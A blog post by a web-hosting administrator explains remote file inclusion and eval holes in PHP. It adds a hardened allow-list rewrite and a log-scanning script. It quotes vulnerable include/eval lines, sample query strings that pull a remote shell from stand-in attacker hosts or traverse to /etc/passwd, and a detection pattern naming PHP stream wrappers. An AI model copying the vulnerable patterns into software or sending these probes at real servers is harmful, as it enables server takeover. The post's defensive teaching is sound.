I’m becoming more and more of the belief that I should REFUSE to host people who either upload other people’s code without knowing how it works, OR write poor code themselves.
Why is this?
Simple… In the last year, I’ve had two people upload code that they did not write, and that code accepted a query string that looked like this:
index.html?abs_path=http://www.jrcorps.com/
Now, that alone wouldn’t be so bad, if they didn’t have a line of code that looked like this:
eval($_GET['abs_path']);
or
include $_GET['abs_path'];
This is almost as bad, because the "/home/" prefix stops a remote URL but not "../": the attacker can still walk out of /home/ and include any file the web server can read:
include "/home/" . $_GET['abs_path'];
In any case, what am I trying to say? Every one of these lines hands whatever the client sent to a function that executes it: eval() runs the string as PHP directly, and include fetches and runs the file or URL it is given (a remote URL only if allow_url_fopen, or allow_url_include on PHP 5.2 and later, is turned on; a path to a file already on the box, such as one dropped in a world-writable tmp directory, works regardless). All of them allow for Remote Code Execution. All of them can set me up for a very, very bad day. Here’s what happens:
- User uploads bad code
- Enemy writes a file browser/remote shell PHP script and hosts it on their own site.
- Enemy finds User’s bad code.
- Enemy sends a line like this: ?abs_path=http://badguyssite.com/asdf.txt
- User’s code runs Enemy’s code on User’s server
- Enemy has as much control over the server as the web server does.
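Here is the vulnerable pattern from the lines above, side by side with a version that is not exploitable, as an added example; this is not code from the original post or from the sites it describes. The file names, the PAGES map, the "page" parameter name and the safe_path() helper are made up for illustration, and the block assumes PHP 7.1 or later.

```php
<?php
// Added example, not the original post's code. The PAGES map, the file names
// and the "page" parameter are assumptions for illustration (PHP 7.1+).

// VULNERABLE: whatever the client sends is handed straight to include.
// With allow_url_include on, ?abs_path=http://attacker.example/shell.txt is
// fetched and executed; even without it, ?abs_path=../../../../etc/passwd or
// the path of a file the attacker already dropped in /tmp still gets included.
function render_vulnerable(array $get): void
{
    include $get['abs_path'];
}

// HARDENED: the client picks a key; the server decides the path.
// Anything not in the map is rejected, so no client-supplied string
// ever reaches include.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page(?string $requested): ?string
{
    if ($requested === null || !array_key_exists($requested, PAGES)) {
        return null;
    }
    return __DIR__ . '/pages/' . PAGES[$requested];
}

function render_hardened(array $get): void
{
    $path = resolve_page($get['page'] ?? null);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;
}

// For the "/home/" . $_GET[...] case: if a path really must be built from
// client input, resolve it with realpath() and refuse anything that does not
// land inside the base directory. This kills "../" traversal and symlink tricks.
function safe_path(string $base, string $relative): ?string
{
    $baseReal = realpath($base);
    $target   = realpath($base . '/' . $relative);
    if ($baseReal === false || $target === false) {
        return null;
    }
    // The resolved target must start with "<base>/" (not merely share a prefix
    // such as /home/user vs /home/user2).
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    return strncmp($target, $prefix, strlen($prefix)) === 0 ? $target : null;
}

// Quick check from the command line: php pages.php
var_dump(resolve_page('home'));
var_dump(resolve_page('http://attacker.example/shell.txt'));
var_dump(safe_path(__DIR__, '../../../etc/passwd'));
```

The point of resolve_page() is that the client never supplies a path, only a key the server looks up; an unknown key is a 404 and nothing reaches include. Setting allow_url_include = Off in php.ini (the default since it appeared in PHP 5.2) stops the http:// case, but it does nothing against "../" or against a file the attacker has already written to /tmp, so the allow-list (or the realpath() confinement) is what actually closes the hole.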
Now some of you are saying, “Well, my web server runs as nobody and all my permissions are set up right… What can anyone do to hurt me as user nobody?”
The short answer: probably nothing. The long answer is, if you’re using PHP, then you probably have a tmp folder the web server can write to (PHP needs one for file uploads and sessions)… If you have a tmp folder, the enemy’s included script can write its own files there, so the enemy now has code of their own sitting on your server.
But Justin… they can still only run it as nobody…
Yes, but nobody still has the power to do some things… For example, serve up massive amounts of data (your box becomes their file-sharing or spam host), run infinite “for” loops that eat your CPU, or simply find a way, such as a local privilege-escalation bug, to install a rootkit. In any case, they can do things to make your server unusable… They might not be able to compromise data… but unusable is just as bad in some cases.
If your machine is ever compromised this way, I strongly recommend finding the hole as fast as possible and removing it from your system. Once you do, I strongly recommend you remove any code that they might have uploaded to your box. Lastly, I strongly recommend that you run a few scans on your box, including but not limited to:
- A Nessus Scan
- An RkHunter Scan
- A Virus Scan
- A Process Scan
- A Port Scan
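The quickest way to find the hole is usually the web server’s access log: the attack leaves the remote URL or the traversal path sitting right in the query string. The script below is an added example (not from the original post) that sweeps common-log-format lines for that signature. The log lines are constructed samples and the host names in them are made up.

```php
<?php
// Added example, not code from the original post. Scans access-log lines for
// query-string values that look like remote-file-inclusion or traversal probes.
// The log lines below are constructed samples; the host names are made up.

$sampleLog = <<<'LOG'
203.0.113.7 - - [10/Oct/2006:13:55:36 -0700] "GET /index.php?abs_path=http://badguyssite.example/asdf.txt HTTP/1.1" 200 2326
198.51.100.2 - - [10/Oct/2006:13:55:40 -0700] "GET /index.php?abs_path=about HTTP/1.1" 200 1024
203.0.113.7 - - [10/Oct/2006:13:56:01 -0700] "GET /index.php?abs_path=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 812
203.0.113.9 - - [10/Oct/2006:13:57:13 -0700] "GET /gallery.php?img=php://input HTTP/1.1" 500 0
LOG;

// A value that a legitimate client should never pass to include() or eval():
// a remote scheme or PHP stream wrapper, or a directory-traversal sequence.
function is_inclusion_probe(string $value): bool
{
    // parse_str() already decodes once; decoding again catches double-encoded probes.
    $decoded = rawurldecode($value);
    // Remote schemes and stream wrappers that turn include into code execution.
    if (preg_match('#^(https?|ftp|php|data|expect|phar)://#i', $decoded)) {
        return true;
    }
    // Traversal aimed at local files (passwd, server logs, uploads in /tmp).
    if (strpos($decoded, '../') !== false || strpos($decoded, '..\\') !== false) {
        return true;
    }
    return false;
}

// Returns one finding per suspicious parameter: [client IP, parameter, value].
function scan_log(string $log): array
{
    $findings = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        // Common/combined log format: client IP first, request in the first quoted field.
        if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) /', $line, $m)) {
            continue;
        }
        $ip     = $m[1];
        $target = $m[2];
        $query  = parse_url($target, PHP_URL_QUERY);
        if (!$query) {
            continue;
        }
        parse_str($query, $params);
        foreach ($params as $name => $value) {
            if (is_string($value) && is_inclusion_probe($value)) {
                $findings[] = [$ip, $name, $value];
            }
        }
    }
    return $findings;
}

// From the command line: php scan_log.php
foreach (scan_log($sampleLog) as [$ip, $name, $value]) {
    printf("%-15s %-10s %s\n", $ip, $name, $value);
}
```

Against a real log, replace the embedded sample with file_get_contents() of the access log; the value column then tells you which parameter was abused and where the payload was fetched from, which is the file to go and pull off the box. Pair the log sweep with a look through the tmp directory and the document root for PHP files you did not put there.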
I’ve included links to some of these on the left side.
Countdown to some sort of vacation: 2 days